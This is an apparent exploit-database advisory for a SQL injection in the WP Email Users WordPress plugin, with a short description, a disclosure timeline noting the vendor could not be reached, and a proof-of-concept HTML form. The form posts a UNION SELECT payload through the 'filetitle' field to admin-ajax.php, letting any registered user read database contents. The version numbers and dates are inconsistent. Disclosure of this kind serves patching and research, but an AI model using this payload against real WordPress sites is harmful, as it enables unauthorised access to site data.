# Exploit Title:  WP Email Users – 1.4.1 – Plugin WordPress – Sql Injection
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/wp-email-users/
# Software Link: https://wordpress.org/plugins/wp-email-users/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.3.1
# Tested on: Ubuntu 14.04

1 - Description:

Type user access:  is accessible for any registered user

$_REQUEST[‘edit’] is escaped wrong. Attack with Sql Injection

http://lenonleite.com.br/blog/2017/01/17/english-wp-email-users-1-4-1-plugin-wordpress-sql-injection/

2 - Proof of Concept:

1 – Login as regular user (created using wp-login.php?action=register):

2 – Using:

<form action="http://localhost:8080/wp-admin/admin-ajax.php" method="post">
    <input type="text" name="action" value="weu_my_action">
    <input type="text" name="filetitle" value="0 UNION SELECT CONCAT(name,char(58),slug) FROM wp_terms WHERE  term_id=1">
    <input type="text" name="temp_sel_key" value="select_temp">
    <input type="submit" name="">
</form>


3 - Timeline:

    12/01/2016 – Discovered
    13/12/2016 – Vendor not finded